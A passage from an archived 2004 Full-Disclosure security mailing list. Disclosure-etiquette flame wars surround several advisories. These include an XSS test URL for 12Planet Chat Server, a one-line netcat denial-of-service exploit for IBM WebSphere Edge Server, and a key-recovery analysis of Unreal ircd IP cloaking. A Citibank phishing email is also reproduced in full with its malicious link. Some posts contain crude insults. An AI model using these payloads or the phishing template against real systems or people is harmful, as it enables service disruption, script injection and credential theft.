I keep the 200,000 computing devices worldwide within my organization
from being owned and then attacking each other?"

Anyone with a truly complex security problem knows that it is hopeless
to ever really control many computers in the presence of many people.
You have no choice in a complex situation but to let things happen that
you think are beneficial to you (the vendor installing patches, in this
discussion) and find a way, after the fact, or periodically, to confirm
that the end result was in fact beneficial to you.

Sincerely,

Jason Coombs
jasoncscience.org

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
Re: [Full-Disclosure] Gmail Information Disclosure Vulnerability

From: System Outage (system_outageyahoo.com)
Date: Sun Jul 04 2004 - 16:40:13 CDT

Gmail service is in Beta. You have no credibility posting this advisory. The correct channel to post such "bugs" is the Gmail contact link for "bug reports".
 
If you weren't a script kiddie or scene whore, you would have known to hold information until such a time that Gmail became a public service.
 
Then and only then would anyone take this advisory seriously!
 
You obviously have no understanding of the "Beta" state of a development. The fact that a team of developers are in the state of "Beta" means that the developers are fully aware the service may not be entirely secure and they wish feedback via Google's own beta "bug report" channels.
 
All in all, this is a "beta bug report" and nothing else. If you had waited until the Gmail dev team declared gmail a public release, you would have gained more respect in the security community scene.
 
Cheerio
 
 

                
---------------------------------
Do you Yahoo!?
Yahoo! Mail - 50x more storage than other providers!

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
Re: [Full-Disclosure] Re:Bugtraq Security Systems

From: System Outage (system_outageyahoo.com)
Date: Sun Jul 04 2004 - 17:04:27 CDT

A name like "Bugtraq Security Systems" Sounds like a typical name a script kiddie group or scene whore group would use to try and gain an easy name within the scene.

 They (Bugtraq Security Systems) obviously thought... Hey.. "if we whore a high profile name and make our website look professional, people will buy it and think we're elite".

Lol, if you had any cred in the security community scene, you just lost it by mentioning the key words "Defcon" and "Drew Copley is a prick" references.

All you are making yourself out to be is a jealous scene whore who wishes they had the 0-day exclusives that Eyee Security obtain and you wish you were as good as they are.

You have no right to come on a high profile security mailing list with such childish remarks towards a highly respected Security Group as Eyee. Go find some "elite" zero day and come back when you manage to gain as much respect as Eyee Security has within the security community scene.

Cheerio

__________________________________________________
Do You Yahoo!?
Tired of spam? Yahoo! Mail has the best spam protection around
http://mail.yahoo.com

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
[Full-Disclosure] Re:Bugtraq Security Systems

From: Boggles (boggleshush.com)
Date: Sun Jul 04 2004 - 17:37:52 CDT

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

So Boggles was just settling down to a lunch of pan fried Big Bird and
suddenly all hell broke out.

Unlike normal, there were no email's in Boggles inbox to aid decision
making process.

After careful inspection of Body hair the following was revealed as the
cause of the problem (rabies/tetnus/wh0ritus shot(s) is/are recommended
in cases of actually reading emails which trigger the alert):

****************************
:BOGGLES IDS SECURITY ALERT:
****************************
Type: High fibre
Pattern Matched:
"On [A-Za-z]+, [0-3][0-9] 20[0-9][0-9], System Outage wrote"
Action Taken: Message Deleted
Suggest fix:
"Boggles Internal Defacation System recommends
that no action be taken, comedy posts such as those
provided by System Outage do the community good on a
4th July afternoon."

Clarification:
"Lol, if you had any cred in the security community scene, you just lost
it by mentioning the key words "Defcon" and "Drew Copley is a prick"
references."

By the same laws (see today's earlier post for a good legal contact)
this means that "if you had any cred in the security community scene,
 you just lost it" [before anyone says "But Mr Boggles, that means you
have too", Boggles has no cred (infact Boggles LIKES SOCKS WITH HIS SANDLES)]

Boggles going to hunt snuffleupagi for desert now.

- --
Boggles Funniest Quotes:

"I have work to do..."
  ++ Drew Copley, iDefense
-----BEGIN PGP SIGNATURE-----
Note: This signature can be verified at https://www.hushtools.com/verify
Version: Hush 2.4

wkYEARECAAYFAkDohqEACgkQ2IK15vxw2kPstACfWcpe9ofJBg7KfNbrL2wypglJ7lgA
nAr23FgU1jtDoAOSWxzZRNj1Qt+F
=wmAR
-----END PGP SIGNATURE-----

Concerned about your privacy? Follow this link to get
secure FREE email: http://www.hushmail.com/?l=2

Free, ultra-private instant messaging with Hush Messenger
http://www.hushmail.com/services-messenger?l=434

Promote security and make money with the Hushmail Affiliate Program:
http://www.hushmail.com/about-affiliate?l=427

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
RE: [Full-Disclosure] IE Web Browser: "Sitting Duck"

From: joe (mvpjoeware.net)
Date: Sun Jul 04 2004 - 19:35:11 CDT

The fun thing with you is that irregardless of what I say, it isn't, in your
esteemed opinion, correct.

Why? Because you once took to understand something I said as defending
Microsoft which is against your very narrow viewpoint so automatically I
can't possibly have any valid viewpoint.

So, for instance, when I say outright, that the fact IE was sold to a bunch
of legal people (see my previous comments on legal type people) as core by
MS completely incorrectly in the viewpoint of looking at the OS components
technically you still choose to try to harrass. Note I say try. Had that
same thing been said by someone posting with some open source email client
on *nix you would have been applauding assuming you understand 822.

As I mailed to you offlist, any time you are willing to discuss things
intelligently, email me. Posts such as the one below simply hurt your cause,
whatever in the world that might be.

Being Bill Gates would be kind of cool. In those shoes I would sell off
every piece of MS I owned that the government would allow and go buy Tahiti
or Aruba or both and not touch a computer again. Again, remember, computers
aren't about religion, it is a means to an end. Work to live, don't live to
work.

BTW, it is joe, not JOE - I am case sensitive and you hurt my feelings.

   joe

 

-----Original Message-----
From: full-disclosure-adminlists.netsys.com
[mailto:full-disclosure-adminlists.netsys.com] On Behalf Of
bills.bitchhushmail.com
Sent: Saturday, July 03, 2004 4:45 PM
To: full-disclosurelists.netsys.com
Subject: Re: [Full-Disclosure] IE Web Browser: "Sitting Duck"

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

ha ha ha ha ha the dog bites his master he he he he

Couple of things

Judge: What is this Internet Explorer thing Gates?
Bll Gates: Its a core component of the operating sytem ma'am
Judge: BULLSHIT GATES! JOE SAYS IT ISN'T

Judge: YOUR GUILTY!
Bill Gates: oh
JUDGE: 6 POSSIBLE SENTENSES, JAIL, FINE, FIX, REPENT, SUSPEND, GO TO JOE
SCHOOL OF REHABILITATION
joe: you see you see, the judge has given him six options, that means he's
not guilty, do you see what I mean. Can you see it can you see it.

By the way did I tell you about my last gig, I made a whack of dough off it
and now I am sitting on the beach in Taihiti sucking back margaritas.

*sigh* I wish I were Bill Gates, he be so cool

-----BEGIN PGP SIGNATURE-----
Note: This signature can be verified at https://www.hushtools.com/verify
Version: Hush 2.4

wkYEARECAAYFAkDnGt4ACgkQ9hJzGKhH2LeB8QCfannTbF14n/e2+gsGCHrr8bslFRAA
oLNZTgVQWsDJqDtjYdzDoHvDRy89
=HDOv
-----END PGP SIGNATURE-----

Concerned about your privacy? Follow this link to get secure FREE email:
http://www.hushmail.com/?l=2

Free, ultra-private instant messaging with Hush Messenger
http://www.hushmail.com/services-messenger?l=434

Promote security and make money with the Hushmail Affiliate Program:
http://www.hushmail.com/about-affiliate?l=427

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
Re: [Full-Disclosure] Gmail Information Disclosure Vulnerability

From: D.J. Capelis (djcapelispyahoo.com)
Date: Sun Jul 04 2004 - 19:41:19 CDT

The notion that this list is only for reporting
bugs in software that isn't in beta is absurd.
If there's a major vulnerablity in gaim or
firefox I'd expect to hear about them on this
list. (Both are in beta (firefox is alpha I
think they like to say these days?)) If there is
a large userbase using it that is vulnerable to a
security concern then it should be on this list.
That's what this list is about, making people
aware and sharing new security vulnerabilities.

So stop shouting that (s)he's losing
"credibility" in the "scene." In my eyes he
gained a lot by actually classifying his neat
little hack by saying it's got a really low
severity. (And by finding a small hole in gmail,
there's plenty of people looking and google has
some great coders.) More "respected" security
firms should take a leaf from his/her book and
learn to mark severity of their discoveries
correctly.

(And really? The security "scene?" What is this
too you, a little social teaparty?)

~D.J. Capelis~
Security and Cryptography Researcher

--- System Outage <system_outageyahoo.com>
wrote:
> Gmail service is in Beta. You have no
> credibility posting this advisory. The correct
> channel to post such "bugs" is the Gmail
> contact link for "bug reports".
>
> If you weren't a script kiddie or scene whore,
> you would have known to hold information until
> such a time that Gmail became a public service.
>
> Then and only then would anyone take this
> advisory seriously!
>
> You obviously have no understanding of the
> "Beta" state of a development. The fact that a
> team of developers are in the state of "Beta"
> means that the developers are fully aware the
> service may not be entirely secure and they
> wish feedback via Google's own beta "bug
> report" channels.
>
> All in all, this is a "beta bug report" and
> nothing else. If you had waited until the Gmail
> dev team declared gmail a public release, you
> would have gained more respect in the security
> community scene.
>
> Cheerio
>

        
                
__________________________________
Do you Yahoo!?
New and Improved Yahoo! Mail - 100MB free storage!
http://promotions.yahoo.com/new_mail

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
RE: [Dailydave] Re: [Full-Disclosure] Public Review of OIS Security Vulnerability Reporting and Response Guidelines

From: Steve W. Manzuik (steveentrenchtech.com)
Date: Sun Jul 04 2004 - 22:38:49 CDT

Interesting they skipped VulnWatch in this mailing.........

> -----Original Message-----
> From: dailydave-bounceslists.immunitysec.com
> [mailto:dailydave-bounceslists.immunitysec.com] On Behalf Of dave
> Sent: Sunday, July 04, 2004 11:19 AM
> To: OIS
> Cc: NTBUGTRAQLISTSERV.NTBUGTRAQ.COM;
> bugtraqsecurityfocus.com; full-disclosurelists.netsys.com
> Subject: [Dailydave] Re: [Full-Disclosure] Public Review of
> OIS Security Vulnerability Reporting and Response Guidelines
>
> Nobody trusts the OIS or its motives. I imagine this is
> similar to the feedback you've gotten from everyone else as
> well, but Immunity has no plans to subscribe to your
> guidelines, and is going to oppose any efforts you make to
> legislate those guidelines as law. In section 1.1 the draft
> proposes that the purpose of the OIS's model is to protect
> systems from vulnerabilities. This is fairly obviously untrue
> - the purpose of the OIS is to lobby towards a business model
> for Microsoft and the other OIS members that involves the
> removal of non-compliant security researchers.
>
> This call for feedback is a thinly disguised attempt to get
> public legitimacy and allow the OIS to claim it has community
> backing, which it clearly does not.
>
> It's rare, but there are still security companies and
> individuals who do not owe their entire business to money
> from Microsoft. It's July 4th.
> and some of us are Americans who understand the concept of
> independance.
>
> Dave Aitel
> Immunity, Inc.
>
>
>
>
> OIS wrote:
>
> > -----BEGIN PGP SIGNED MESSAGE-----
> > Hash: SHA1
> >
> > The Organization for Internet Safety (OIS) extends an invitation to
> > the readers of the BugTraq, NTBugtraq, and Full-Disclosure mailing
> > lists to participate in the ongoing public review of the
> OIS Security
> > Vulnerability Reporting and Response Guidelines.
> > The OIS reviews the Guidelines annually to ensure that they remain
> > useful and relevant to the security community and, most
> importantly,
> > to the millions of computer users who are the ultimate
> beneficiaries
> > of effective computer security practices. Over the past
> year, OIS has
> > received feedback from many adopters of the Guidelines as
> well as from
> > several public-private partnerships, and have incorporated much of
> > this feedback into an interim version that is available at
> > http://www.oisafety.org/review/draft-1.5.pdf. We recommend
> reviewing
> > the interim version, but reviewers are welcome to provide
> feedback on
> > the original version at
> http://www.oisafety.org/reference/process.pdf
> > if they would like.
> >
> > For more information on the public review, please visit
> > http://www.oisafety.org/review-1.5.html. The closing date for the
> > review has been extended until 16 July 2004. We look
> forward to your
> > feedback.
> >
> > Regards,
> >
> > The Organization for Internet Safety
> > www.oisafety.org
> >
> > -----BEGIN PGP SIGNATURE-----
> > Version: PGP 8.0.3
> >
> > iQA/AwUBQOWQgbF9hclyvjnOEQIhmACfYlaHX2NnJbHUCaCYfMHO4tkGDh0AoMzz
> > KWNTvxgQVKXiC1OU9CR/rXYF
> > =4mT/
> > -----END PGP SIGNATURE-----
> >
> > _______________________________________________
> > Full-Disclosure - We believe in it.
> > Charter: http://lists.netsys.com/full-disclosure-charter.html
>
>
>
> _______________________________________________
> Dailydave mailing list
> Dailydavelists.immunitysec.com
> http://www.immunitysec.com/mailman/listinfo/dailydave
>

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
Re: [Full-Disclosure] Gmail Information Disclosure Vulnerability

amforwardmailsurf.com
Date: Mon Jul 05 2004 - 01:37:27 CDT

System Outage wrote:

|The correct channel to post such "bugs" is the Gmail contact link for "bug
|reports".

I have already contacted Gmail about 10 days ago, but I have not received any
replies till this moment.

|If you had waited until the Gmail dev team declared gmail a public release,
|you would have gained more respect in the security community scene.

I don't think this is about respect afterall.

Regards,
Ahmed Motaz

------------------------------------------------------
Mailsurf.com your communication portal for SMS,
Email, Fax, E-Cards and more. www.mailsurf.com

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
Re: [Full-Disclosure] Gmail Information Disclosure Vulnerability

From: Rudolf Polzer (divzerogmail.com)
Date: Mon Jul 05 2004 - 01:27:34 CDT

> Gmail service is in Beta. You have no credibility posting this advisory. The correct channel to post such "bugs" is the Gmail contact link for "bug reports".
> If you weren't a script kiddie or scene whore, you would have known to hold information until such a time that Gmail became a public service.

Then he'd probably be regarded as a kiddie too... unless he has
reported the bug before. Keeping bugs secret and waiting until many
people use a product, then releasing the advisory is in two senses
contraproductive:

a) if you had disclosed the information to the author (here: Google)
before, the bug would most probably have been fixed
b) more people are affected by waiting

Posting it here while gmail is in beta stadium is not SO bad - but one
should also report it to gmail themselves.

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
[Full-Disclosure] XSS in 12Planet Chat Server 2.9

From: Donato Ferrante (fdonatoautistici.org)
Date: Mon Jul 05 2004 - 02:56:21 CDT

                           Donato Ferrante

Application: 12Planet Chat Server
              http://www.12planet.com

Version: 2.9

Bug: cross site scripting

Date: 05-Jul-2004

Author: Donato Ferrante
              e-mail: fdonatoautistici.org
              web: www.autistici.org/fdonato

xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

1. Description
2. The bug
3. The code
4. The fix

xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

----------------
1. Description:
----------------

Vendor's Description:

"The #1 Professional Chat Server Software, bringing instant
communication into web sites, intranet and extranet portals:
setup your community chat rooms, organize celebrity chat events,
collaborative work sessions or online meetings."

xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

------------
2. The bug:
------------

The input strings, into some field, are not filtered by the server so
they will appear in the returned page.

xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

-------------
3. The code:
-------------

To test the vulnerability:

http://[host]:8080/servlet/one2planet.infolet.InfoServlet?
page=<script>alert("hy")</script>

( all on the same line )

xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

------------
4. The fix:
------------

No fix.
The vendor has not answered to my signalations.

xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
Re: [Full-Disclosure] HP urges users to erase Netscape to avoid security problems

From: Szilveszter Adam (adamnhh.hu)
Date: Mon Jul 05 2004 - 03:29:21 CDT

Barry Fitzgerald wrote:

> Heh.
>
> The article has the following quote:
>
> "On other platforms, such as Linux, Unix and the Mac, Explorer is less
> of a threat."
>
> Uhh... yeah, you could say that it's less of a threat on GNU/Linux and
> Unix... non-existance will do that.

Ummm, perhaps people have a short attention span, but IE used to exist
for Solaris and HP-UX at one time. (It was in the 4.x version) But I
doubt it has been maintained since. (Heck, I even have a Unix binary of
the then NetShow player, which has later mutated into Windows Media
Player the hog, replacing the small and dull video player from win95
days... i plays older .asf streams/files all right.)

And yes, from the article it really looks to me that HP was talking
about the long-discontinued 4.x (pre-Mozilla) version of Netscape, which
used to be available for many platforms and has seen steady use even
after 6.x came out, because

1) it was a lot smaller and faster esp in the beginning (remember, at
the time Mozilla leaked memory like a sieve, and was so slow that you
easily could go for a coffee break, this is what allowed eg Opera to
jump into the fray and strike it big)
2) it had an integrated Java Virtual Machine (albeit a fairly antiquated
one) which helped platforms where a plugin was not available
3) it had the familiar look-and-feel whereas the new Mozilla look really
took some adjustment
4) it was included on just about any installation CD etc just like older
version of Acrobat Reader were, to access HTML docs.

And yes, *that* browser is full of bugs by now... even though for a
while, Netscape/AOL used to put out minor bugfix releases in silence,
exactly because they knew it was used by many...

Regards,
Sz.

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
[Full-Disclosure] Huge amounts of Citipank phishing spam seen this weekend.

From: Feher Tamas (etomcatfreemail.hu)
Date: Mon Jul 05 2004 - 06:15:30 CDT

Return-Path: <safecitibank.com>
Delivered-To: xyz.com
Received: (qmail 26637 invoked by alias); 5 Jul 2004
10:22:42 -0000
Delivered-To: xyz.com
Received: (qmail 26625 invoked from network); 5 Jul 2004
10:22:42 -0000
Received: from unknown (HELO xxxxx) (192.168.xxx.xxx)
  by xxxxx.xxxxx.com with SMTP; 5 Jul 2004 10:22:42 -0000
Received: from [192.168.xxx.xxx]:3815 (EHLO xxxxxxx)
 by xxxxxx ([192.168.xxx.xxx]:25) (censored) with SMTP; Mon,
5 Jul 2004 10:22:39 -0000
Received: from avenirdev.net2.nerim.net
(avenirdev.net2.nerim.net [213.41.129.36]) by xxxxxxxx
(8.12.9/8.12.9) with SMTP id i65AMbvX009990;
Mon, 5 Jul 2004 12:22:38 +0200
X-Message-Info: EUZieVCD797cazJifePDLup79PXxd1+Jmeve090esDKB
Received: from bvoadkrq795.yahoo.com ([183.192.129.62]) by
cv840-ena634.yahoo.com with Microsoft SMTPSVC(5.0.2195.6824);
Mon, 05 Jul 2004 14:02:44 +0300
Received: from Byronz447z00uvb7j ([192.91.180.33]) by
mxbj13.yahoo.com (InterMail vM.5.01.06.05
105-294-922-056-415-584970568) with SMTP id
<5635443945.NANBL433.zsvlyce336.yahoo.combootleggedve0rum66afa40fp>
for <xyz.com>; Mon, 05 Jul 2004 06:04:44 -0500
Message-ID:
<179zi495neg7525$29816$x937hcd073Byronsmb495qc15mza67qrv>
From: "Support" <safecitibank.com>
To: <xyz.com>
Subject: Urgent Update: CitiSafe by Citibank
Date: Mon, 05 Jul 2004 17:02:44 +0600
MIME-Version: 1.0
Content-Type: multipart/alternative;
boundary="--60788191235995120027"
X-Spam-Checker-Version: SpamAssassin 2.63 (2004-01-11) on xxxxx
X-Spam-Level: **
X-Spam-Status: No, hits=2.0 required=4.5
tests=BAYES_40,HTML_MESSAGE,
        HTML_TITLE_UNTITLED,MIME_HTML_ONLY,MIME_HTML_ONLY_MULTI,
        NORMAL_HTTP_TO_IP autolearn=no version=2.63

----60788191235995120027
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

<html>
<head>
<title>Untitled Document</title>
<meta http-equiv=3D"Content-Type" content=3D"text/html;
charset=3Diso-8859=
-1">
</head>

<body bgcolor=3D"#FFFFFF" text=3D"#000000">
<b>Dear Citibank Customer</b>,
<p> We recently noticed one or more attempts to log in to
your Citibank<br=
>
  account from a foreign IP address and we have reasons to
believe that<br=
>
  there was attempts to compromise it with brute forcing
your PIN number.<=
br>
  No successful login was detected and you have full
protection by now. <b=
r>
  If you recently accessed your account while travelling,
the unusual logi=
n<br>
  attempts may have been initiated by you.</p>
<p><i>The login attempt was made from:<br>
  IP address: 173.97.087.24<br>
  ISP Host: cache-89.proxyserver.cis.com</i></p>
<p> By now, we used many techniques to verify the accuracy
of the<br>
  information our users provide us when they register on the
Site.<br>
  However, because user verification on the Internet is
difficult, Citiban=
k<br>
  cannot and does not confirm each user's purported
identity. Thus, we<br>=

  have established an offline verification system to help
you evaluate wit
h<br>
  whom you are dealing with. The system is called CitiSafe
and it's<br>
  the most secure Citibank wallet so far.</p>
<p> If you are the rightful holder of the account, click the
link bellow, =
fill<br>
  the form and then submit as we will verify your identity
and register yo=
u<br>
  to CitiSafe free of charge. This way you are fully
protected from fraudu=
lent<br>
  activity on all the accounts that you have with us.</p>
<p> <u><b><a
href=3D"http://219.148.127.66/scripts/confirmation.htm">Click=
 to protect
  yourself from fraudulent activity!</a></b></u></p>
<p> To make Citibank.com the most secure site, every user
will be <br>
  registered to CitiSafe.</p>
<p> <u>NOTE! If you choose to ignore our request, you leave
us no choice b=
ut to<br>
  temporally suspend your account.</u></p>
<p> * <u>Please do not respond to this e-mail, as your reply
will not be r=
eceived.</u></p>
<p>Regards, <b>Citibank Customer Support</b><br>
</p>
</body>
</html>

----60788191235995120027--

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
[Full-Disclosure] Re: [FD] VERY HIGH VULNERABILITY DISCLOSURE !!! MASS ROOT POSSIBLE !!! PLEASE BE ATTENTIVE !!!

From: Thomas Binder (full-disclosurearago.de)
Date: Mon Jul 05 2004 - 07:30:05 CDT

Hi!

On Sat, Jul 03, 2004 at 06:18:59PM +0200, Rudolf Polzer wrote:
> IMHO it will be nice if one could override some php.ini settings
> on a per-script basis.

When using PHP as an Apache module, you can achieve something like
that in httpd.conf:

<Location /path/to/broken/script.php
        php_admin_flag register_globals on
</Location>

<Location /path/to/sane/script.php
        php_admin_flag register_globals off
</Location>

Ciao

Thomas

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
[Full-Disclosure] CYBSEC - Security Advisory: Denial of Service in IBM WebSphere Edge Server

From: Leandro Meiners (lmeinerscybsec.com)
Date: Mon Jul 05 2004 - 07:25:23 CDT

The following advisory is also available in pdf for download at
http://www.cybsec.com/vuln/IBM-WebSphere-Edge-Server-DOS.pdf

CYBSEC S.A.
www.cybsec.com

Advisory Name: Denial of Service in WebSphere Edge Server.
Vulnerability Class: Denial of Service
Release Date: June 2nd 2004
Affected Applications:

      * WebSphere Edge Components Caching Proxy 5.02 using
        JunctionRewrite with UseCookiedirective.

Not Affected Applications:

      * WebSphere Edge Components Caching Proxy 5.02 NOT using
        JunctionRewrite with UseCookie directive.
      * WebSphere Edge Components Caching Proxy 5.00

Affected Platforms:

      * SUSE SLES 8
      * SUSE SLES 8 Service Pack 1
      * SUSE SLES 8 Service Pack 3
      * SUSE SLES 8 Service Pack 3
      * Apparently all platforms running WebSphere Edge Server

Local / Remote: Remote
Severity: High
Author: Leandro Meiners.
Vendor Status:

      * Fix included in WebSphere Application Server 5.0.3 (to be
        released)
      * Patch available from IBM for clients with Support Level 2 or 3

Reference to Vulnerability Disclosure Policy:
http://www.cybsec.com/vulnerability_policy.pdf

Overview:

WebSphere Edge Component Caching Proxy, part of WebSphere Application
Sever, is a reverse proxy designed to reduce bandwidth use and improve a
Web site's speed and reliability by providing a point-of-presence node
for one or more back-end content servers. It is built to work with
content provided by one or more backend WebSphere Application Servers.

Vulnerability Description:

The vulnerability discovered allows a remote attacker to generate a
denial of service condition against the WebSphere Edge Component Caching
Proxy.

If the reverse proxy is configured with the JunctionRewrite directive
being active, a remote attacker can trivially cause a denial of service
by executing the GET HTTP method without parameters.

Exploit:

$ echo ŽGET¡ | nc <victim_host_ip> <proxy_port>

Solutions:

If JunctionRewrite is unnecessary, disabling it will suffice to prevent
the Denial of Service. Also if the option UseCookie in the
JunctionRewrite directive is unnecessary disabling it will suffice to
prevent the Denial of Service.

Vendor Response:

IBM opened a case regarding the vulnerability and provided a patch
within 2 weeks of the initial contact.

Contact Information:

For more information regarding the vulnerability feel free to contact
the author at lmeinerscybsec.com.

For more information regarding CYBSEC: www.cybsec.com

----------------------------
Leandro Meiners
CYBSEC S.A. Security Systems
E-mail: lmeinerscybsec.com
Tel/Fax: [54-11] 4382-1600
Web: http://www.cybsec.com

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
[Full-Disclosure] Unreal ircd 3.2 clocking subsystem vulnerability

From: bartavelle (bartavelle-anti-spam-thingiebanquise.net)
Date: Mon Jul 05 2004 - 07:23:55 CDT

Software name: Unreal ircd
Vulnerable versions: 3.2 and probably previous versions
Problem nature: Information disclosure

Summary:
Unreal ircd is a popular irc server. One of the features it provides is
called 'ip cloaking'. The purpose of this system is to prevent hostile
irc users from getting the IP address of other users.

In order to prevent ip bruteforcing, it uses three 'keys'. However, the
hashing system is weak.

It is possible to recover the keys of several irc networks by knowing
only one clear text and hashed IP, and another hashed IP.

Details:
The IPv4 hashing scheme is the most vulnerable. Code from cloak.c
follows:

====
/* Do IPv4 cloaking here */
strlcpy(h1, host, sizeof h1);
i = 0;
for (i = 0, p = strtok(h1, "."); p && (i <= 3); p = strtok(NULL, "."), i++)
{
         strncpy(h2[i], p, 4);
}
ircsprintf(h3, "%s.%s", h2[0], h2[1]);
l[0] = ((our_crc32(h3, strlen(h3)) + KEY) ^ KEY2) + KEY3;
ircsprintf(h3, "%s.%s.%s", h2[0], h2[1], h2[2]);
l[1] = ((KEY2 ^ our_crc32(h3, strlen(h3))) + KEY3) ^ KEY;
l[4] = our_crc32(host, strlen(host));
l[2] = ((l[4] + KEY3) ^ KEY) + KEY2;
l[2] &= 0x3FFFFFFF;
l[0] &= 0x7FFFFFFF;
l[1] &= 0xFFFFFFFF;
snprintf(cloaked, sizeof cloaked, "%lX.%lX.%lX.IP", l[2], l[1], l[0]);
free(host);
return cloaked;
====

h2[0], h2[1], h2[2], h2[3] contain the four bytes of the original IP.
l[0], l[1], l[2] contain the hashed IP. Thus:

l[0] = (((crc32("1.2") + key1) ^ key2) + key3) & 0x7FFFFFFF;
l[1] = (((crc32("1.2.3") ^ key2) + key3) ^ key1) & 0xFFFFFFFF;
l[2] = (((crc32("1.2.3.4") + key3) ^ key1) + key2) & 0x3FFFFFFF;

crc32(xxx) and l[x] are is known. The three keys are used in such a way
that the n-th bit of any key does not affect bits bellow n in the hash.

We have successfully writen a program that bruteforces one bit at a
time. It takes less than one second to do that on a pentium4 1.8ghz.

Doing this on a known IP produces around 2000 possible key
combinations. It is then trivial to test them all in order to find the
working ones.

Solution:
Update to version 3.2.1

Up to date information:
http://www.bandecon.com/?action=advisory&adv=unreal

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
Re: [Full-Disclosure] Public Review of OIS Security Vulnerability Reporting and Response Guidelines

From: Georgi Guninski (guninskiguninski.com)
Date: Mon Jul 05 2004 - 08:20:42 CDT

we have discussed this before.
the answer again is:
WE'RE NOT GONNA TAKE IT [1]

--
[1] WE'RE NOT GONNA TAKE IT
Twisted Sister
http://www.elyrics4u.com/w/we_re_not_gonna_take_it_twisted_sister.htm
Your life is trite and jaded
Boring and confiscated

On Fri, Jul 02, 2004 at 02:04:29PM -0700, OIS wrote:
> -----BEGIN PGP SIGNED MESSAGE-----
<sh*t deleted>

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
Re: [Full-Disclosure] Huge amounts of Citipank phishing spam seen this weekend.

From: Duncan Hill (dhill+fulldisccricalix.net)
Date: Mon Jul 05 2004 - 08:38:36 CDT

On Monday 05 July 2004 12:15, Feher Tamas might have typed:

> <b>Dear Citibank Customer</b>,
> <p> We recently noticed one or more attempts to log in to
> your Citibank<br=

> <p><i>The login attempt was made from:<br>
> IP address: 173.97.087.24<br>
> ISP Host: cache-89.proxyserver.cis.com</i></p>
> <p> By now, we used many techniques to verify the accuracy

> whom you are dealing with. The system is called CitiSafe
> and it's<br>
> the most secure Citibank wallet so far.</p>

That's a pretty nice bit of dumb-user engineering. Couple of spelling
mistakes in the actual phishing pages (wget + less = wonderful), but
otherwise quite well crafted. I'd swear I even see a browser URL overlay or
similar to give the impression of a different site to the real one.

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
Re: [Full-Disclosure] Gmail Information Disclosure Vulnerability

From: System Outage (system_outageyahoo.com)
Date: Mon Jul 05 2004 - 08:46:42 CDT

If it's not about respect then what is it about?
 
You have no respect for the Gmail Team, that's for sure.
 
I guess this list isn't about respect...
 
It's about kiddies posting advisories and exploits for fun and little care for the vendor(s).
 
 
Cheerio
 

amforwardmailsurf.com wrote:
System Outage wrote:

|The correct channel to post such "bugs" is the Gmail contact link for "bug
|reports".

I have already contacted Gmail about 10 days ago, but I have not received any
replies till this moment.

|If you had waited until the Gmail dev team declared gmail a public release,
|you would have gained more respect in the security community scene.

I don't think this is about respect afterall.

Regards,
Ahmed Motaz

------------------------------------------------------
Mailsurf.com your communication portal for SMS,
Email, Fax, E-Cards and more. www.mailsurf.com

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

                
---------------------------------
Do you Yahoo!?
Yahoo! Mail - Helps protect you from nasty viruses.

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
Re: [Full-Disclosure] Gmail Information Disclosure Vulnerability

From: Will Image (xillwillxyahoo.com)
Date: Mon Jul 05 2004 - 09:34:57 CDT

calm down system , you act like he just fucked your
sister in the ass on prom night... the list is for
disclosure and thats what hes doing, making people
away of a flaw.. who cares if its beta a flaw is a
flaw

--- System Outage <system_outageyahoo.com> wrote:
> If it's not about respect then what is it about?
>
> You have no respect for the Gmail Team, that's for
> sure.
>
> I guess this list isn't about respect...
>
> It's about kiddies posting advisories and exploits
> for fun and little care for the vendor(s).
>
>
> Cheerio
>
>
> amforwardmailsurf.com wrote:
> System Outage wrote:
>
